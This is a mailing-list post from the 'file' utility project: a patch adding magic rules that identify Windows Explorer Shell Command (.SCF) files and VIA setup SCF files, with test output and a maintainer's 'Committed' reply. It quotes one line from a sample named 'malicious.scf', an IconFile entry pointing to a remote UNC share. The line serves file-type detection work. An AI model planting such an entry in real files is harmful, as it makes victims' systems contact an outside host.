[File] [PATCH] Magdir/windows Explorer Command Shell *.SCF described as Generic INI

Christos Zoulas christos at zoulas.com
Wed Nov 30 20:24:55 UTC 2022 

Committed, thanks!

christos

> On Nov 30, 2022, at 3:12 PM, Jörg Jenderek <joerg.jen.der.ek at gmx.net> wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> Hello,
> 
> some days ago i read an interesting article in German computer
> magazine c't in number 24 from 2022. There was described the
> efforts and methods of Microsoft to protect their system.
> Unfortunately Microsoft is non-transparent like FIFA and do not
> exactly explain why something is happing. Luckily in the article 39
> file name suffix are listed which considered to be potential
> dangerous. One extension is SCF.
> 
> So i look on my Systems for such files. When running file command
> version 5.43 on SCF samples and related files i get an output like:
> 
> Desktop anzeigen.scf: Generic INItialization configuration [Taskbar]
> EXPLORER.SCF:         Generic INItialization configuration [Taskbar]
> SETUP.SCF:            Generic INItialization configuration [SERVICE]
> SPELLER.SCF:          data
> channels.scf:         Generic INItialization configuration [IE]
> desktop.scf:          Generic INItialization configuration [Taskbar]
> hadifix.scf:          data
> malicious.scf:        Generic INItialization configuration [Taskbar]
> shortcuts.scf:        XML 1.0 document, ASCII text,
> 
> With option --extension only 3 byte sequence ??? or wrong ini/inf
> is shown and with -i option only generic
> application/x-wine-extension-ini or text/xml is shown.
> 
> For comparison reason i run the file format identification utility
> TrID ( See https://mark0.net/soft-trid-e.html). The XML based SCF
> samples are described correctly as "Double Commander Shortcuts" by
> scf-dc.trid.xml. The most other examples are also described with low
> rate as "Generic INI configuration" by ini.trid.xml. The SETUP.SCF
> example is described with higher rate as "VIA setup configuration
> file" by scf-via.trid.xml. The remaining SCF samples are described as
> "Windows Explorer Command Shell File" by scf-exp.trid.xml or as
> "(alt) variant by scf-exp-old.trid.xml (See appended
> trid-v-scf.txt.gz).
> 
> For comparison reason i also run the file format identification
> utility DROID ( See https://sourceforge.net/projects/droid/).
> The XML based SCF is described as "Extensible Markup Language" by
> fmt/101	and the other samples are not recognized.
> 
> The INI based samples should be recognized by subroutine ini-file
> inside Magdir/windows. If the samples are only described as Generic
> INItialization configuration that means a suited branch is missing
> inside sub routine. So i looked inside TrID definition what is the
> characteristic. There i saw that it test for a line which look like:
> [Shell]
> The samples where this is the first line are described by
> scf-exp.trid.xml. In the other case this line occurs as second line
> after a first empty line. These samples are described by
> scf-exp-old.trid.xml. So inside sub routine after found left bracket
> i insert branch looking for section name Shell after Windows codepage
> translator branch. The TrID also looks for keyword ICONFILE. When
> looking in my examples and samples considered as "bad" these contain
> lines like:
> IconFile=explorer.exe,3
> IconFile=\\10.10.16.2\share\test.ico
> In second sample an icon or file from somewhere on the net is loaded
> and handled. So this probably why SCF are considered as potentially
> dangerous. So shown now these information for such SCF samples by
> lines like:
>>> &0	regex/c	\^Shell]\r\n	Windows Explorer Shell Command File
> !:mime	text/x-ms-scf
> !:ext	scf
>>>> 1	search/128	IconFile=	\b, icon
>>>>> &0	string		x		"%s"
> Instead of generic mime type text/plain i show an user defined one
> and add information comment line like:
> # Reference:	http://mark0.net/download/triddefs_xml.7z/defs/s/
> #		scf-exp.trid.xml,
> #		scf-exp-old.trid.xml
> 
> Luckily with information given by TrID for VIA examples that
> informations are expressed by comment lines inside Magdir/images like
> :
> # URL:		http://en.wikipedia.org/wiki/VIA_Technologies
> # Reference:	http://mark0.net/download/triddefs_xml.7z
> #		defs/s/scf-via.trid.xml
> 
> So i looked inside TrID definition what is the characteristic.
> There i saw that it test for first lines which starts like:
> [SCF]
> COMPANY=
> So inside sub routine after found left bracket i insert branch
> looking for section name SCF after Windows Explorer Shell Command
> File branch. So shown now these information for such VIA SCF
> samples by lines like:
>>> &0	regex/c	\^SCF]\r\n	VIA setup configuration
> !:mime	text/x-via-scf
> !:ext	scf
> Instead of generic mime type text/plain i show an user defined one.
> 
> After applying the above mentioned modifications by patch
> file-5.43-windows-scf.diff then most SCF samples are
> now described with more detail and correct name suffix.
> This now then looks like:
> 
> Desktop anzeigen.scf: Windows Explorer Shell Command File, icon
> 		      "explorer.exe,3"
> EXPLORER.SCF:         Windows Explorer Shell Command File, icon
> 		      "explorer.exe,1"
> SETUP.SCF:            Generic INItialization configuration [SERVICE]
> SPELLER.SCF:          data
> channels.scf:         Windows Explorer Shell Command File, icon
> 		      "shdocvw.dll,-118"
> desktop.scf:          Windows Explorer Shell Command File, icon
> 		      "explorer.exe,3"
> hadifix.scf:          data
> malicious.scf:        Windows Explorer Shell Command File, icon
> 		      "\\10.10.16.2\share\test.ico"
> shortcuts.scf:        ASCII text, with CRLF line terminators
> 
> I hope my diff file can be applied in future version of file
> utility.
> 
> I would like to add magic for Double Commander Shortcuts, but
> in Magdir/sgml exist "many" fragments for XML based files. So some
> times an XML type is missed or i must use -k option and get more
> describing text like "XML 1.0 document text" and "XML document" for
> shortcuts.scf example which is confusing "normal" users and me too.
> So the Magdir/sgml needs some updates that unifies the fragments.
> 
> Then there exist samples like SPELLER.SCF and hadifix.scf with
> other file format.
> 
> With best wishes,
> Jörg Jenderek
> - --
> Jörg Jenderek
> -----BEGIN PGP SIGNATURE-----
> Comment: Using GnuPG with Thunderbird - https://www.enigmail.net/
> 
> iF0EARECAB0WIQS5/qNWKD4ASGOJGL+v8rHJQhrU1gUCY4e5IgAKCRCv8rHJQhrU
> 1tseAJ93w1W86nvHLCo/3GGCdG/3p1ES3QCcDQ7OYmA/vM64LbPEuED8jY712GY=
> =UrGj
> -----END PGP SIGNATURE-----
> <Nachrichtenteil als Anhang.DEFANGED-202997><file-5_43-windows-scf_diff.DEFANGED-202998><file-5_43-windows-scf_diff_sig.DEFANGED-202999><trid-v-scf.txt.gz>--
> File mailing list
> File at astron.com
> https://mailman.astron.com/mailman/listinfo/file
> <sanitizer.log>

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 235 bytes
Desc: Message signed with OpenPGP
URL: <https://mailman.astron.com/pipermail/file/attachments/20221130/d6ded69f/attachment.asc>

More information about the File mailing list